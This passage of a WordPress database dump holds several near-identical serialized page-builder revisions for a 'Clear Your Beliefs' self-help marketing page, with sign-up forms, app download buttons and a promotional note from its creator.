(1393, 1834, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1272:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1423:"<div id="divStroke letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2811:"<div id="divStroke lette">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1392, 1833, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1272:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1416:"<div id="divStroke" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1395, 1836, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1271:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and\nNegative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1431:"<div id="divStroke" class="letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come 